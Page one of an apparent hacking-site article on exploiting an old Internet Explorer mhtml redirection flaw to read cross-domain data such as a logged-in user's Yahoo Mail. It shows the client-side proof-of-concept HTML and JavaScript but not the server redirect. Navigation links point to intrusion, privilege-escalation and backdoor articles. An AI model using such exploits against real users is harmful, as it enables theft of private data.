·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]IE mhtml redirection漏洞利用方法

热荐 ★★★★

IE mhtml redirection漏洞利用方法

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-5-17 10:17:25

这个漏洞主要是信息泄露，参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全，xmlhttp是无法跨域获取信息的。但是IE出现安全问题，在服务端通过mhtml重定向漏洞，可以利用xmlhttp跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后，通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0，我使用IE7同样遭到攻击。

下面是主页面，通过xmlhttp请求本域的页面。（这里改成直接访问其他域会出现拒绝访问错误）

<html>

<head>

<script language="JavaScript">

// Start XML HTTP Request Object

var request = InitXMLHttpRequest();

function StartTest()

{

document.getElementById("result").innerHTML = "init ok<br />";

document.getElementById("result").innerHTML += "begain open<br /> ";

// Open/

request.open('GET', 'http://www.icylife.net/valu1.php', true);

document.getElementById("result").innerHTML += "begain send<br /> ";

request.onreadystatechange = WhenDone;

// Make the request

request.send();

}

// Function for Initialising the XMLHttpRequest

function InitXMLHttpRequest()

{

var request;

try

{

request = new XMLHttpRequest();

}

catch (trymicrosoft)

{

try

{

request = new ActiveXObject("Msxml2.XMLHTTP");

}

catch (othermicrosoft)

{

try

{

request = new ActiveXObject("Microsoft.XMLHTTP");

}

catch (failed)

{

request = false;

}

}

}

// Initialised?

if ( !request )

{

alert("Due to limitations of your browser you will not be able to use this page.");

}

else

{

return request;

}

}

function WhenDone( )

{

if ( request.readyState == 4 )

{

document.getElementById("result").innerHTML = request.responseText;

}

}

</script>

</head>

<body>

<b>Start the test:</b><br>

<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>

<br />

<div id="result"></div>

</body>

</html>

[1] [2] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：记一次报复性的渗透

下一篇文章：通过dvbbs 7.1拿权限过程

【字体：小大】

中介交易区

最新热门

一次通过 Oracle8i 入侵系统之旅	03-21
SA权限下的思路变通	03-18
有防火墙的网站整个入侵过程	01-21
绕过Xplog70.dll玩入侵	01-14
一步一步的入侵----only for you	01-09
入侵中快速获得Web根目录的技巧	01-09
记一次对RedHat Linux系统的安全	01-08
介绍几个小工具和入侵的技法(2)	01-08
有防火墙的网站整个入侵过程	01-04
拐弯入侵虚拟主机	01-04
由一次入侵实例看虚拟主机系统的	01-02
解读IDS入侵检测系统术语	01-02

突破IE安全限制获取iframe子框架内的本
解决 Vista IE 7.0 自动关闭的问题
给你的IE套件盔甲
IE的0DAY网马
Aviv Raff的IE0day公布了
IE浏览器上不去网显示找不到服务器的解
Windows XP系统中如何重装IE浏览器
移动IE缓存，释放Vista系统磁盘空间
对于最近几天的IE新漏洞临时解决方法
2007年IE 0day 网马
IE中实现全屏广告代码，霸道无比!
IE打不开网页的终极方案